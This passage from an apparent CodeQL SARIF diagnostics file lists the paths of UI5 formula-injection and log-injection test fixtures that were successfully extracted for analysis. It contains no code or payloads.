nostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":290}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js","uriBaseId":"%SRCROOT%","index":2}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/package-lock.json","uriBaseId":"%SRCROOT%","index":291}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/package.json","uriBaseId":"%SRCROOT%","index":292}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/ui5.yaml","uriBaseId":"%SRCROOT%","index":293}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":294}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/index.html","uriBaseId":"%SRCROOT%","index":295}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":296}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/index.js","uriBaseId":"%SRCROOT%","index":297}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":298}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/package-lock.json","uriBaseId":"%SRCROOT%","index":299}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/package.json","uriBaseId":"%SRCROOT%","index":300}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":301}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/ui5.yaml","uriBaseId":"%SRCROOT%","index":302}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":303}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/index.html","uriBaseId":"%SRCROOT%","index":304}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":305}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/index.js","uriBaseId":"%SRCROOT%","index":306}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":307}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":308}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-getLogEntries/package-lock.json","uriBaseId":"%SRCROOT%","index":309}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-getLogEntries/package.json","uriBaseId":"%SRCROOT%","index":310}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-getLogEntries/ui5.yaml","uriBaseId":"%SRCROOT%","index":311}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-getLogEntries/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":312}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-getLogEntries/webapp/index.html","uriBaseId":"%SRCROOT%","index":313}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-getLogEntries/webapp/index.js","uriBaseId":"%SRCROOT%","index":314}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-getLogEntries/webapp/utils/LogEntriesToHttp.js","uriBaseId":"%SRCROOT%","index":315}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-getLogEntries/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":316}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-js-object/package-lock.json","uriBaseId":"%SRCROOT%","index":317}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-js-object/package.json","uriBaseId":"%SRCROOT%","index":318}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-js-object/ui5.yaml","uriBaseId":"%SRCROOT%","index":319}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-getLogEntries/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":320}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-js-object/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":321}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-js-object/webapp/index.html","uriBaseId":"%SRCROOT%","index":322}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-js-object/webapp/index.js","uriBaseId":"%SRCROOT%","index":323}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-js-object/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":324}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-js-object/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":325}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-sap-module/package-lock.json","uriBaseId":"%SRCROOT%","index":326}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-sap-module/package.json","uriBaseId":"%SRCROOT%","index":327}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-sap-module/ui5.yaml","uriBaseId":"%SRCROOT%","index":328}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-sap-module/webapp/index.html","uriBaseId":"%SRCROOT%","index":329}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-sap-module/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":330}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-sap-module/webapp/index.js","uriBaseId":"%SRCROOT%","index":331}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-sap-module/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":332}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-sap-module/webapp/utils/CustomLogListener.js","uriBaseId":"%SRCROOT%","index":333}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-sap-module/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":334}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-sap-module-imported/package-lock.json","uriBaseId":"%SRCROOT%","index":335}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-sap-module-imported/package.json","uriBaseId":"%SRCROOT%","index":336}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-sap-module-imported/ui5.yaml","uriBaseId":"%SRCROOT%","index":337}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-sap-module-imported/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":338}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-sap-module-imported/webapp/index.html","uriBaseId":"%SRCROOT%","index":339}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-sap-module-imported/webapp/index.js","uriBaseId":"%SRCROOT%","index":340}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-sap-module-imported/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":341}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-sap-module-imported/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":342}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-sap-module-imported/webapp/utils/CustomLogListener.js","uriBaseId":"%SRCROOT%","index":343}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/package-lock.json","uriBaseId":"%SRCROOT%","index":344}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/package.json","uriBaseId":"%SRCROOT%","index":345}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/ui5.yaml","uriBaseId":"%SRCROOT%","index":346}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":347}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/index.html","uriBaseId":"%SRCROOT%","index":348}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":349}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":350}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/index.js","uriBaseId":"%SRCROOT%","index":351}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/package-lock.json","uriBaseId":"%SRCROOT%","index":352}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/package.json","uriBaseId":"%SRCROOT%","index":353}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/ui5.yaml","uriBaseId":"%SRCROOT%","index":354}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":355}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/index.html","uriBaseId":"%SRCROOT%","index":356}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/index.js","uriBaseId":"%SRCROOT%","index":357}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":358}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/utils/CustomLogListener.js","uriBaseId":"%SRCROOT%","index":359}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/utils/LogEntriesToHttp.js","uriBaseId":"%SRCROOT%","index":360}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":361}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/package-lock.json","uriBaseId":"%SRCROOT%","index":362}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/package.json","uriBaseId":"%SRCROOT%","index":363}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":364}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/index.html","uriBaseId":"%SRCROOT%","index":365}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/ui5.yaml","uriBaseId":"%SRCROOT%","index":366}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/index.js","uriBaseId":"%SRCROOT%","index":367}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formatted